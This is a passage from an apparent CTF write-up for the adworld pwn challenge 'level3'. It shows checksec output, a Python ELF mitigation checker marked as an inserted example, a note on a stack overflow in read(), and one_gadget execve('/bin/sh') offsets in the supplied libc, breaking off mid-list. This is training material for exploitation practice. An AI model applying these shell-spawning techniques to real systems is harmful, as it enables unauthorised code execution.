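Preface
There is one challenge left over in the pwn beginner area, namely this level3. I think I did not finish it back then because the exploit would not go through against the remote target. As I recall, no library was provided at the time; now a libc_32.so.6 is given.
0x00. Checking protections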
devil@ubuntu:~/adworld/pwn$ checksec level3
[*] '/home/devil/adworld/pwn/level3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found ; a stack overflow is possible
NX: NX enabled
PIE: No PIE (0x8048000)
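Where the four checksec lines above come from, as an added example that is not part of the original post: a minimal reader for the ELF32 program headers that reports the same properties. The function names and the header-only sample image are constructed here; the canary and PIE checks are simplified as noted in the comments.

```python
import struct

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
ET_DYN, PF_X, DF_BIND_NOW, DF_1_NOW = 3, 0x1, 0x8, 0x1

def elf32_mitigations(data: bytes) -> dict:
    """Derive the four checksec properties from a little-endian ELF32 image."""
    if data[:6] != b"\x7fELF\x01\x01":
        raise ValueError("not a little-endian ELF32 file")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<I", data, 28)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx = relro = bind_now = False  # no PT_GNU_STACK header: treat stack as executable
    for i in range(e_phnum):
        p_type, p_offset, _, _, p_filesz, _, p_flags, _ = struct.unpack_from(
            "<8I", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
        elif p_type == PT_DYNAMIC:
            # Walk Elf32_Dyn entries (tag, value) looking for eager binding.
            for off in range(p_offset, p_offset + p_filesz, 8):
                tag, val = struct.unpack_from("<II", data, off)
                if tag == DT_NULL:
                    break
                if (tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                    bind_now = True
    return {
        "RELRO": ("Full" if bind_now else "Partial") if relro else "No",
        # Simplification: a real checker inspects the symbol table, not raw bytes.
        "Canary": b"__stack_chk_fail" in data,
        "NX": nx,
        "PIE": e_type == ET_DYN,  # simplification: shared objects are ET_DYN too
    }

def constructed_sample() -> bytes:
    """Constructed header-only image with the same properties as level3 above."""
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", b"\x7fELF\x01\x01\x01", 2, 3, 1,
                       0x8048000, 52, 0, 0, 52, 32, 2, 0, 0, 0)  # ET_EXEC, EM_386
    stack = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, 6, 16)  # RW, no X
    relro = struct.pack("<8I", PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1)
    return ehdr + stack + relro
```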
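0x01. Stack overflow vulnerability
The read call has an obvious stack overflow vulnerability. The program itself contains no system("/bin/sh"), so a shell cannot be obtained directly through the overflow.
0x02. one_gadget
Ever since I learned to use one_gadget, it has worked every time on challenges that provide a libc.
For a hands-on walkthrough of one_gadget, see this.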
devil@ubuntu:~/adworld/pwn$ one_gadget libc_32.so.6
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
esi is the GOT address of libc
[esp+0x28] == NULL
0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
esi is the GOT address of libc
[esp+0x2c] == NULL
0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
esi is the GOT address of libc
[esp+0x30] == NULL
0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
esi is the GOT address of libc
[esp+0x34] == NULL
0x5f065